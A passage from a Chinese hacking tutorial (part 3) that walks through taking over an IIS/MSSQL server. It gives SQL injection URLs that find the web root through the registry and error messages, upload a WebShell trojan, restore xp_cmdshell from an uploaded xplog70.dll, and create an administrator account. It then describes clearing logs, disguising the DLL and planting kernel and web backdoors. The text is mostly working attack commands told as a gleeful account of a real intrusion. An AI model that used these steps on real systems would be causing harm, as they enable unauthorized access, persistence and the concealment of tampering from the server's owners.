利用纯脚本技术获得系统权限详解(3)

好，拿到Web绝对路径后。继续建表:

http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));

这样我们就成功地建了一个名为cyfd的表，并且添加了类型是char，长度为255的字段名gyfd。然后向表中加数据:

http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Pa rameters\Virtual Roots’, ’/’, @result output insert into cyfd (gyfd) values(@result);--

从注册表中读出Web绝对路径，再把路径插入到刚建的表中。然后报出WebShell的绝对路径：

http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd 

where gyfd > 1) 

出错后，IE返回错误，我们得到Web绝对路径“d:\Inetpub\wwwroot”！经过努力的成功特别香甜！喝口茶！

然后删除刚才建的表，提交：

http://www.something.com/script.asp?id=2;drop table cyfd;--

OK，有了路径下面就好办多了。打开我写的获取WebShell的程序，输入漏洞URL：http://www.yfd.com/yfd.com?id=2

输入保存木马的绝对路径：d:\Inetpub\wwwroot。

木马我早就配置好了，代码精简了又精简，只有30行代码，这样才少向服务器提交数据。加快速度嘛！木马的主要功能，就是输入内容，把输入的内容保存为一个文件。呵呵，通过这样的木马，我们就可以实现上传一些功能强大的脚本木马了，如海洋木马。

一分钟不到。程序都已经运行完毕。输入相应的路径，娃哈哈（wtf：要饭的兄弟挺喜欢这个“饮品”？哈哈！），WebShell来了，最快的速度生成了一个海洋木马，如图4，图5:

我生活在幸福之中！——wtf常常说这句话，今天看来我也被感染了！下面我们还得来！



四．恢复xp_cmdshell，向系统权限进军！

下面的工作就是很简单，很轻松了。10分钟不到，就给你一个管理员账号，都说了xp_cmdshell已经被删除了。并且无法恢复，这多半是管理员把xplog70.dll文件给删除，要不改名了。没事，我们上传一个xplog70.dll就搞定一切了，通过WebShell。我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了，来吧，我们来给他恢复，提交：

http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, ’e:\inetpub\wwwroot\xplog70.dll’

恢复，支持绝对路径的恢复哦。：）

OK。我们用IE来查看一下是不是已经恢复了。提交：

http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = ’X’ AND name = ’xp_cmdshell’)

嘿嘿。返回正常。已经恢复了，下面的还用我说吗？呵呵！加账号:

http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell ’net user chouyfd chouyfd1314yf /add’

提升自己为超级管理员

http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators chouyfd /add’

完毕。打开你的终端连接程序，连接吧!哈哈，终于给我连上了。到此我就成功的拿到了这台主机的系统管理员账号。如图7:

下面的工作就是清除日志和留下超级后门，闪人!



五．事后处理工作

终端连接上后，以最快的速度，清除IIS日志，和MSSQL日志。

同时，把xp_cmdshell也给他删除掉，不要让他发现了,也就不好办了。再把我上传的那个xplog70.dll移动到system32目录下，改个我都不知道什么意思的名字叫：msxlog32.dll（打死他也查不出来，哈哈！）再将猪蛋儿提供的超级内核后门程序安装起，再把存在漏洞的脚本文件给打上补丁。同时在他的那个脚本程序中，我修改了代码，提交特定的参数(POST提示方式)，显示我的Web后门程序! 这样两个后门，很保险！怕什么呢？刚过年，真开心啊！